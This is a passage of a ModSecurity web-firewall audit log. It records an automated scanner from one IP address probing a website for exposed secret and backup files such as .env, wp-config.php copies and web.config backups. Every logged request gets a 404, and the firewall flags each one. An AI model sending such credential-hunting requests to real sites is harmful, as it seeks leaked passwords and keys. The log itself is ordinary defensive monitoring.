808 Connection: close Content-Type: text/html --005e251a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/bak/.env.backup"] [unique_id "aFBqs33hoSwVUy254pH0AAAAACQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/bak/.env.backup"] [unique_id "aFBqs33hoSwVUy254pH0AAAAACQ"] Stopwatch: 1750100659605917 3135 (- - -) Stopwatch2: 1750100659605917 3135; combined=1820, p1=446, p2=1300, p3=0, p4=0, p5=74, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --005e251a-Z-- --cf2ac23d-A-- [17/Jun/2025:00:34:19.719874 +0530] aFBqsx6Azi2u_ik2Q3Ko4gAAAAY 185.177.72.201 35508 127.0.0.1 7080 --cf2ac23d-B-- GET /.env.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cf2ac23d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --cf2ac23d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.old"] [unique_id "aFBqsx6Azi2u_ik2Q3Ko4gAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/.env.old"] [unique_id "aFBqsx6Azi2u_ik2Q3Ko4gAAAAY"] Stopwatch: 1750100659716387 3544 (- - -) Stopwatch2: 1750100659716387 3544; combined=2142, p1=422, p2=1630, p3=0, p4=0, p5=90, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf2ac23d-Z-- --fb0c6c01-A-- [17/Jun/2025:00:34:19.830753 +0530] aFBqsxwcFb_n1P0IC9xlFAAAAAo 185.177.72.201 35522 127.0.0.1 7080 --fb0c6c01-B-- GET /.env.production HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fb0c6c01-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --fb0c6c01-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.production"] [unique_id "aFBqsxwcFb_n1P0IC9xlFAAAAAo"] Stopwatch: 1750100659827212 3595 (- - -) Stopwatch2: 1750100659827212 3595; combined=2124, p1=417, p2=1649, p3=0, p4=0, p5=58, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb0c6c01-Z-- --40520219-A-- [17/Jun/2025:00:34:20.052645 +0530] aFBqtI3q6eGJ2xNcTd6GlwAAAAU 185.177.72.201 35546 127.0.0.1 7080 --40520219-B-- GET /composer.json.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --40520219-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --40520219-H-- Message: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.backup"] [unique_id "aFBqtI3q6eGJ2xNcTd6GlwAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.backup"] [unique_id "aFBqtI3q6eGJ2xNcTd6GlwAAAAU"] Stopwatch: 1750100660048462 4262 (- - -) Stopwatch2: 1750100660048462 4262; combined=2551, p1=544, p2=1894, p3=0, p4=0, p5=113, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --40520219-Z-- --2fd6db08-A-- [17/Jun/2025:00:34:20.384741 +0530] aFBqtJVkCcfT-Z8NQYyUnwAAAAc 185.177.72.201 35576 127.0.0.1 7080 --2fd6db08-B-- GET /.env~ HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2fd6db08-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2fd6db08-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env~"] [unique_id "aFBqtJVkCcfT-Z8NQYyUnwAAAAc"] Stopwatch: 1750100660381251 3545 (- - -) Stopwatch2: 1750100660381251 3545; combined=2080, p1=452, p2=1567, p3=0, p4=0, p5=61, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2fd6db08-Z-- --4c79007b-A-- [17/Jun/2025:00:34:20.605326 +0530] aFBqtCid3pHxA3RhGpzp-gAAAAk 185.177.72.201 35606 127.0.0.1 7080 --4c79007b-B-- GET /wp-config.php.2 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4c79007b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4c79007b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.2"] [unique_id "aFBqtCid3pHxA3RhGpzp-gAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.2' not found or unable to stat Stopwatch: 1750100660602268 3114 (- - -) Stopwatch2: 1750100660602268 3114; combined=1804, p1=402, p2=1341, p3=0, p4=0, p5=61, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4c79007b-Z-- --5af1be3d-A-- [17/Jun/2025:00:34:20.715685 +0530] aFBqtH8PxMRZ7s11niQJqAAAAAI 185.177.72.201 35622 127.0.0.1 7080 --5af1be3d-B-- GET /wp-config.php.8 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5af1be3d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --5af1be3d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.8"] [unique_id "aFBqtH8PxMRZ7s11niQJqAAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.8' not found or unable to stat Stopwatch: 1750100660712792 2948 (- - -) Stopwatch2: 1750100660712792 2948; combined=1658, p1=381, p2=1220, p3=0, p4=0, p5=57, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5af1be3d-Z-- --0f819a7c-A-- [17/Jun/2025:00:34:20.826024 +0530] aFBqtFJfblPUQiSn5r1hYAAAAAA 185.177.72.201 35640 127.0.0.1 7080 --0f819a7c-B-- GET /index.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0f819a7c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0f819a7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/index.php.backup"] [unique_id "aFBqtFJfblPUQiSn5r1hYAAAAAA"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/index.php.backup' not found or unable to stat Stopwatch: 1750100660822940 3140 (- - -) Stopwatch2: 1750100660822940 3140; combined=1770, p1=355, p2=1351, p3=0, p4=0, p5=64, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f819a7c-Z-- --a64c5354-A-- [17/Jun/2025:00:34:21.157159 +0530] aFBqtVJfblPUQiSn5r1hYQAAAAA 185.177.72.201 35686 127.0.0.1 7080 --a64c5354-B-- GET /web.config.orig HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a64c5354-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a64c5354-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.orig"] [unique_id "aFBqtVJfblPUQiSn5r1hYQAAAAA"] Stopwatch: 1750100661154349 2863 (- - -) Stopwatch2: 1750100661154349 2863; combined=1605, p1=351, p2=1206, p3=0, p4=0, p5=48, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a64c5354-Z-- --6623d66c-A-- [17/Jun/2025:00:34:21.271312 +0530] aFBqtSid3pHxA3RhGpzp_AAAAAk 185.177.72.201 35694 127.0.0.1 7080 --6623d66c-B-- GET /wp-config.php.9 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6623d66c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6623d66c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.9"] [unique_id "aFBqtSid3pHxA3RhGpzp_AAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.9' not found or unable to stat Stopwatch: 1750100661267809 3563 (- - -) Stopwatch2: 1750100661267809 3563; combined=2126, p1=516, p2=1566, p3=0, p4=0, p5=44, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6623d66c-Z-- --2c568d36-A-- [17/Jun/2025:00:34:22.045520 +0530] aFBqtn8PxMRZ7s11niQJrAAAAAI 185.177.72.201 35802 127.0.0.1 7080 --2c568d36-B-- GET /web.config.temp HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2c568d36-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2c568d36-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.temp"] [unique_id "aFBqtn8PxMRZ7s11niQJrAAAAAI"] Stopwatch: 1750100662041545 4058 (- - -) Stopwatch2: 1750100662041545 4058; combined=2430, p1=482, p2=1873, p3=0, p4=0, p5=74, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2c568d36-Z-- --87a0cc69-A-- [17/Jun/2025:00:34:22.267130 +0530] aFBqtlJfblPUQiSn5r1hZAAAAAA 185.177.72.201 35836 127.0.0.1 7080 --87a0cc69-B-- GET /composer.json.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --87a0cc69-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --87a0cc69-H-- Message: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.bak"] [unique_id "aFBqtlJfblPUQiSn5r1hZAAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.bak"] [unique_id "aFBqtlJfblPUQiSn5r1hZAAAAAA"] Stopwatch: 1750100662263185 4025 (- - -) Stopwatch2: 1750100662263185 4025; combined=2495, p1=461, p2=1893, p3=0, p4=0, p5=141, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87a0cc69-Z-- --6438ed4f-A-- [17/Jun/2025:00:34:22.378430 +0530] aFBqtiid3pHxA3RhGpzp_wAAAAk 185.177.72.201 35846 127.0.0.1 7080 --6438ed4f-B-- GET /wp-config.php HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6438ed4f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Connection: close Content-Type: text/html; charset=UTF-8 --6438ed4f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php"] [unique_id "aFBqtiid3pHxA3RhGpzp_wAAAAk"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'Primary script unknown' Apache-Handler: proxy:unix:/var/www/vhosts/system/surbhiprintographics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750100662374450 4055 (- - -) Stopwatch2: 1750100662374450 4055; combined=2261, p1=443, p2=1685, p3=33, p4=31, p5=69, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6438ed4f-Z-- --8ee9852a-A-- [17/Jun/2025:00:34:22.490198 +0530] aFBqtn3hoSwVUy254pH0CAAAACQ 185.177.72.201 35860 127.0.0.1 7080 --8ee9852a-B-- GET /wp-config.php.save HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8ee9852a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8ee9852a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.save"] [unique_id "aFBqtn3hoSwVUy254pH0CAAAACQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.save' not found or unable to stat Stopwatch: 1750100662486432 3853 (- - -) Stopwatch2: 1750100662486432 3853; combined=2232, p1=525, p2=1631, p3=0, p4=0, p5=76, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8ee9852a-Z-- --ecacc023-A-- [17/Jun/2025:00:34:22.711774 +0530] aFBqtk3CmevS3xeTzmoi9AAAAAQ 185.177.72.201 35878 127.0.0.1 7080 --ecacc023-B-- GET /changelog.txt.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 